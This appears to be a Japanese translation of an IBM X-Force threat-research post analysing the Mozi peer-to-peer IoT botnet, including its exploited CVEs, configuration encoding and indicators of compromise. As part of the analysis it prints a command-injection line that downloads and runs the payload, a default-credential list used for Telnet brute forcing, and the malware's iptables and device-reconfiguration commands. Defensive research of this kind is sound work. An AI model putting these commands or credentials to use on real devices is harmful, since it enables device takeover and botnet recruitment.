セキュリティー

新たなボットネット攻撃が街に出現

オフィスの机でコンピューターを操作しながら集中する女性プログラマー

著者

Dave McMillen

Senior Threat Researcher

IBM X-Force

Wei Gao

Malware Reverse Engineer

Charles DeBeck

Senior Cyber Threat Intelligence Analyst - IBM

IBM X-Forceは、脅威分野における比較的新しいプレーヤーであるMoziボットネットが、モノのインターネット（IoT）デバイスの間で急増していることを発見しました。

このマルウェアは2019年後半から活動しており、Miraiおよびその亜種とコードと重なっています。Moziは、2019年10月から2020年6月までに観測されたIoTネットワーク・トラフィックのほぼ90％を占めました。

この驚異的な奪取は、全体的なIoTボットネット活動の大幅な増加を伴っており、Moziが競争相手を市場から排除していないことを示唆しています。むしろ市場に浸透し、他の亜種の活動を弱体化させました。全体として、攻撃が著しく増加し始めた2019年10月から2020年6月までのIoT攻撃の合計数は、過去2年間のIoT攻撃数の合計よりも400%増加しています。

2018年6月から2020年5月までのIoT攻撃量のグラフ

このようなIoT攻撃の急増は、さまざまな原因に起因する可能性がありますが、脅威アクターが標的にできるIoT環境が拡大し続けていることが原因である可能性もあります。世界中で約31億台のIoTデバイスが導入されており、IoTの導入率は現在1秒あたり127台にも達しています。

攻撃者はかなり前から、特にMiraiボットネットを介して、これらのデバイスを悪用しています。IBM X-Force Incident Response and Intelligence Services（IRIS）チームは、ほぼ 4 年間にわたってこの現象を追跡してきました。では、なぜ突然急上昇したのでしょうか？IBMの研究によれば、Moziが引き続き成功を収めている主な要因は、コマンド・インジェクション（CMDi）攻撃の利用にあり、この攻撃は、IoT機器の構成ミスから生じる場合が多々あります。IoT使用量の継続的な増加と構成プロトコルの不十分さが、この急増の原因となっている可能性が高いと考えられます。この増加は、新型コロナウイルス感染症の影響で企業ネットワークへのリモート・アクセスが増えたことで、さらに加速された可能性があります。

IoT（モノのインターネット）デバイスはあまねく存在する

IoTボットネットは、分散型サービス拒否（DDoS）攻撃、データの窃取、スパムの送信に利用できます。IoTデバイスには、以下のようなさまざまな種類があります。

  • コンシューマー向けIoT: 監視カメラ、照明制御、家電製品などの家庭用デバイス
  • 商用IoT：さまざまな業界で使用できるように設計されたデバイス。たとえば、医療にはインターネットに接続されたペースメーカーやとモニターがあります。運輸および建設業界では、車両トラッカー、テレマティクス、物流およびサプライチェーン・システム、ビルディング・インフォメーション・モデリングに関連するデバイスを使用しています。
  • エンタープライズIoTプロジェクター、ルーター、セキュリティー・システム、デジタル広告など、オフィスでの使用を想定して設計されたデバイス
  • 産業用IoT：産業用制御システム、生産ライン・オートメーション・システム、ロジック・コントローラー、航空機システム
  • インフラストラクチャーIoT：スマートシティ管理システム、交通制御デバイス、ユーティリティー監視デバイスなど
  • 軍事用モノのインターネット：ウェアラブルな戦闘生体認証デバイス、ロボット、設備

この大規模な攻撃対象領域により、組織はIoTボットネットに対して脆弱なままになっています。それに加えて、これらのデバイスには出荷時からのセキュリティー・ホールが頻繁に見られ、導入時のセキュリティー対策も不十分な場合がよくあります。IoTにおける最も注目すべき脆弱性は、CMDi攻撃を介して発生します。

CMDi攻撃によってMoziボットネットがもたらされる

IBMが観測したほぼすべてのIoTターゲットは、デバイスへの初期アクセスを得るためにCMDi攻撃を使用しようとしました。ターゲットのエンドポイントがIoTであり、これらの攻撃を受けやすい場合は、ペイロードがダウンロードされて実行されました。

CMDi攻撃がIoTデバイスに対して非常に一般的である理由には、いくつかあります。まず、IoT内蔵システムには、一般に悪用可能なWebインターフェースと、ファームウェア開発から残っているデバッグ・インターフェースが含まれています。第2に、IoT Webインターフェースに組み込まれたPHPモジュールを悪用して、悪意のある攻撃者にリモート実行機能を提供する可能性があります。そして第3に、IoTインターフェースは、管理者が予期されるリモート入力をサニタイズしてインターフェースを強化することを怠ったため、導入時に脆弱なままになることがよくあります。 これにより、脅威アクターは「wget」などのシェルコマンドを入力できます。

分析の結果、Moziボットネットが「wget」シェル・コマンドを使用し、その後脅威アクターが影響を受けるシステムと対話できるように権限を変更することでCMDiを活用していることが判明しました。例：

wget http://xxx.xx.xxx.xxx/bins/mozi.a-o /var/tmp/mozi.a;chmod 777 /var/tmp/mozi.a;rm -rf /var/tmp/mozi.a

ホストがCMDiに対して脆弱な場合、このコマンドは「mozi.a」というファイルをダウンロードして実行します。この特定のサンプルの分析では、ファイルはインターロック付きパイプライン・ステージ（MIPS）アーキテクチャーなしでマイクロプロセッサー上で実行されることが示されました。これは、多くの IoTデバイスで普及している、縮小命令セット・コンピューター（RISC）アーキテクチャーを実行するマシンによって理解される拡張機能です。攻撃者がボットネットを通じてデバイスに完全にアクセスすると、ファームウェア・レベルが変更され、追加のマルウェアがデバイスに仕掛けられる可能性があります。

この例ではよく知られたベクトルを挙げていますが、主な理由は2つあります。まず、新たな脆弱性により、CMDiを介したエクスプロイテーションの試みが継続的に更新され、パッチの実装の遅れが悪用される可能性があります。第2に、この活動は簡単に自動化できるため、脅威アクターは低コストで広範囲のデバイスを迅速に攻撃できるようになります。

Moziボットネット・インフラストラクチャーは主に中国で発生しており、観察されたインフラストラクチャーの84％を占めています。この事実は、2020年のIoTに関する他のオープンソースの研究と一致しています。

以下は、IBMが観察したMoziボットネットのエクスプロイトを試みる脆弱性のリストです。

脆弱性影響を受けるデバイス
CVE-2017-17215Huawei HG532
CVE-2018-10561 / CVE-2018-10562GPONルーター
CVE-2014-8361Realtek SDKを使用するデバイス
Eir D1000 ワイヤレス・ルーターRCIEir D1000ワイヤレス・ルーター
CVE-2008-4873Sepal SPBOARD
CVE-2016-6277Netgear R7000 / R6400
Netgear Setup.cgi unauthenticated RCENetgear DGN1000
MVPower DVRコマンド実行MVPower DVR TV-7104HE
CVE-2015-2051D-Linkデバイス
D-Link UPnP SOAPコマンド実行D-Linkデバイス
CCTV-DVRベンダー RCE複数のCCTV-DVRベンダー
Mozi ボットネット技術分析

Moziボットネットは、分散型不正ハッシュ・テーブル（DSHT）プロトコルに基づくピアツーピア（P2P）ボットネットであり、IoTデバイスのエクスプロイトや脆弱なテレネット・パスワードを介して拡散する可能性があります。

実行時に、MoziボットネットはローカルUDPポート14737をバインドしようとします。このサンプルでは、/proc/net/tcpまたは/proc/net/rawを読み取り、ポート1536および5888を使用するプロセスを見つけて強制終了します。このサンプルでは、ファイル/usr/bin/pythonが存在するかどうかを確認します。存在する場合、サンプルはプロセス名をsshdに変更します。それ以外の場合は、サンプルはdropearに変更します。

Moziボットネットには、少なくとも2つの独自の特性があることが知られています。ECDSA384（楕円曲線デジタル署名アルゴリズム384）を使用して完全性を検証します。さらに、Gafgytのコードの一部を再利用します。

これには、P2Pネットワークへの参加に使用できるハードコード化されたDHTパブリック・ノードが含まれています。これらのノードは以下の通りです。

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Moziボットネットには、4つの主要機能が含まれています。DDoS攻撃（HTTP、TCP、UDP）を実行することができます。コマンド実行攻撃を実行する指定されたURLから悪意のあるペイロードをダウンロードして実行するボット情報を収集します。

ファイル・リスト

以下の表に、分析されたファイルの大まかな詳細を示します。詳細には、送信されたファイルと残差ファイルの両方が含まれます（残りのファイルは、マルウェア分析中に静的または動的に抽出されるファイルです）。データには、ファイル名、分析によって決定されたファイル・カテゴリー、ファイル・ハッシュ、テーブル内の他のファイルと関係のあるファイルの親子関係が含まれます。

ファイル名ファイルのカテゴリーファイル・ハッシュ
mozi.mボットネット4dde761681684d7edad4e5e1ffdb940b該当なし
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0aボットネット86d42d968d3d12c36722e16c78e49ffbmozi.m
mozi.aボットネット9a111588a7db15b796421bd13a949cd4該当なし
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053dボットネットdd4b6f3216709e193ed9f06c37bcc3890mozi.a

Moziボットネットの行動分析

実行時、サンプルはローカルUDPポート14737をバインドしようとします。このサンプルでは、/proc/net/tcpまたは/proc/net/rawを読み取り、ポート1536および5888を使用するプロセスを見つけて強制終了します。このサンプルでは、ファイル/usr/bin/pythonが存在するかどうかを確認します。存在する場合、サンプルはプロセス名をsshdに変更します。それ以外の場合、サンプルではdropearに変更されます。

このサンプルでは、ファイル /usr/bin/pythonが存在するかどうかを確認します。存在する場合、サンプルはプロセス名をsshdに変更します。それ以外の場合、サンプルではdropearに変更されます。

また、このサンプルではアクセス制御リストを更新してSSHとTelnetをブロックし、他のボットネットがそれらを使用できないようにしようとします。

iptables -I INPUT  -p tcp –destination-port 22 -j DROP
iptables -I INPUT  -p tcp –destination-port 23 -j DROP
iptables -I INPUT  -p tcp –destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp –source-port 22 -j DROP
iptables -I OUTPUT -p tcp –source-port 23 -j DROP
iptables -I OUTPUT -p tcp –source-port 2323 -j DROP

また、iptable内のハードコード化されたポートをランダムに選択します。

ブログ記事用に作成されたスクリーンショット

DHT

Moziボットネットは、カスタマイズされたDHTプロトコルを使用してP2Pネットワークを開発します。新しいMoziノードがDHTネットワークに参加するプロセスは次のとおりです。

  • 新しいMoziノードは自身を登録するために、http [:] //ia [.] 51 [.] laに最初の HTTPリクエストを送信します。
  • 新しいMoziノードは、8つのハードコード化されたDHTパブリック・ノードにDHT Find_nodeクエリーを送信し、これらのノードを接続してネットワークに参加します。ノードの検索は、IDが与えられたノードの連絡先情報を見つけるために使用されます。これら8つのハードコード化されたDHTパブリック・ノードは次のとおりです。
dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

このサンプルでは、現在のノードのIDを生成する必要があります。Moziに関する360 Netlabレポートによると、「IDは20バイトで、サンプルに埋め込まれたプレフィックス888888または構成ファイル[hp]で指定されたプレフィックスと、ランダムに生成された文字列で構成される」とのことです。構成ファイルは以下のとおりです。

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

DHTネットワークに参加するために、サンプルはこれらのハードコード化されたDHTパブリック・ノードにpingクエリーを送信します。ノードIDを含むpingクエリーは、以下のWiresharkのトラフィックに示されています

ノードIDを含むpingクエリーは、Wiresharkのトラフィックに表示されます

静態分析

どちらのサンプルも、カスタマイズされたUPXパッカーを使用してパックされます。p_info構造のp_file_sizeとp_blocksizeの値をゼロに消去します。

構成ファイル

このサンプルには、以下のハードコード化された構成ファイルが含まれています。

ハードコード化された構成ファイルを含むサンプル

この構成ファイルには、次の4つのセクションがあります。

  • 青：構成データ（428 バイト）
  • 緑：ECCDSA384 signature 1（96バイト）
  • 赤：構成バージョン（4バイト）
  • 黒：ECCDSA384 signature 2（96バイト）

構成データは、ハードコード化されたXORキー、4E665A8F80C8AC238DAC4706D54F6F7Eを使用してエンコードされます。デコードされた構成データは以下のとおりです。

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

構成データは、次のようにタグ付けされた複数のコマンドをサポートしています。

タグ（コマンド）説明
[ss]ボットの役割
[ssx]タグの有効化/無効化 [ss]
[cpu]CPUアーキテクチャー
[cpux]タグの有効化/無効化 [cpu]
[nd]新しいDHTノード
[hp]DHTノードのハッシュ・プレフィックス
[atk]DDoS攻撃タイプ
[ver]DHTプロトコルのVセクションの値
[sv]構成の更新
[ud]ボットの更新
[dr]指定されたURLからペイロードをダウンロードして実行
[rn]指定したコマンドを実行
[dip]ip:portでMoziボットをダウンロード
[idp]ボットを報告
[count]ボットを報告するために使用されるURL

Moziボットネットは、DDoS攻撃でGafgytコードの一部を再利用します。HTTP、TCP、UDPなどの複数のDDoS攻撃タイプをサポートします。

ECDSA384 signature1は、構成データのハッシュ値を検証するために使用されます。検証に使われるハードコード化された公開鍵は次のとおりです。

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 
E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 
22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 
88

XORキー4E665A8F80C8AC238DAC4706D54F6F7Eでエンコードされています。デコードされた公開鍵は次のとおりです。

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 
a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 
6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 
c6

構成バージョンによって、ボットを更新するタイミングが決まります。この値が現在の値より大きい場合に、ボットが更新されます。ECDSA384 signature 2は、構成ファイルの最初の3つの部分を検証するために使用されます。検証に使用されるハードコード化された公開鍵は次のとおりです。

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 
69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 
38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 
A1

XORキー4E665A8F80C8AC238DAC4706D54F6F7Eでエンコードされています。デコードされた公開鍵は次のとおりです。

02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 
27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 
76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea 
ef

Telnetログイン列挙

Moziボットネットは、被害デバイスへのアクセスを取得するために悪用される脆弱性に加えて、ハードコード化された認証情報のリストを使用して、Telnet認証情報を総当たり攻撃することもできます。

root
admin
CUAdmin
default
rapport
super
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
1111
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm

このサンプルで使用する1つのTelnetログイン・ブルートフォース攻撃は次のとおりです。

1つのTelnetログイン・ブルート・フォース

インジケーター

Mozi.mとMozi.a

ネットワーク

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

注目すべき文字列（パックされていない）

8.8.8.8
/proc/net/route
Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0(compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0(Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0(Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0(compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0(compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4;InfoPath.3;SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
GET
HEAD
POST
./config
/tmp/config
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1”
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
iptables -I INPUT  -p tcp –destination-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp –source-port 7547 -j DROP
[cpux]
[/cpux]
[cpu]
[/cpu]
[ssx]
[/ssx]
[ss]
[/ss]
none
[sv]
[/sv]
[rn]
[/rn]
run:
[nd]
[/nd]
/tmp
/var
/temp
iptables -I INPUT  -p udp –destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp –source-port %d -j ACCEPT
iptables -I PREROUTING  -t nat -p udp –destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT
0.0.0.0
[idp]
This node doesn’t accept announces
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881

結論

IoTボットネットの状況は変化し続けており、IBM Securityのデータは、脅威アクターが依然としてこの領域で活動していることを示唆しています。Moziなどの新しいボットネット・グループが活動を拡大し、全体的なIoTアクティビティーが急増する中、IoTデバイスを使用する組織は進化する脅威を認識する必要があります。IBMは、エンタープライズ IoTデバイスが攻撃者による攻撃にさらされることをますます目にしています。コマンド・インジェクションは依然として脅威アクターにとって主な感染経路であり、デフォルトのデバイス設定を変更し、効果的なペネトレーション・テストを使用して防御の隙間を見つけて修正することがいかに重要であるかを繰り返し述べています。

ファイル属性

Mozi.m Metadata

ファイル名：Mozi.m
ファイル・サイズ：108,808
MD5：4dde761681684d7edad4e5e1ffdb940b
SHA1：2327be693bc11a618c380d7d3abc2382d870d48b
SHA256：d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
ファイル・タイプ：ELF 32 ビット MSB実行可能ファイル、MIPS、MIPS-Iバージョン 1（SYSV）、静的リンク、ストリッピング
カテゴリー：ボットネット
IRIS名：Mozi
その他の名称：

Mozi.a Metadata

ファイル名：Mozi.a
ファイル・サイズ：95,268
MD5：9a111588a7db15b796421bd13a949cd4
SHA1：034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256：e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
ファイル・タイプ：ELF 32ビット LSB実行ファイル、ARM、バージョン1、静的リンク、ストリッピング
カテゴリー：ボットネット
IRIS名：Mozi
その他の名称： 

5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata

ファイル名：d546_unpacked
ファイル・サイズ：266、108
MD5：86d42d968d3d12c36722e16c78e49ffb
SHA1：ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256：5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
ファイル・タイプ：ELF 32 ビット MSB実行可能ファイル、MIPS、MIPS-Iバージョン 1（SYSV）、静的リンク、ストリッピング
カテゴリー：ボットネット
IRIS名：Mozi
その他の名称： 

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata

ファイル名：83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
ファイル・サイズ：212、464
MD5：dd4b6f3216709e193ed9f06c37bcc389
SHA1：758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256：83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
ファイル・タイプ：b'ELF 32-bit LSB実行可能、ARM、バージョン1、静的リンク、ストリッピング
カテゴリー：ボットネット
IRIS名：Mozi
その他の名称： 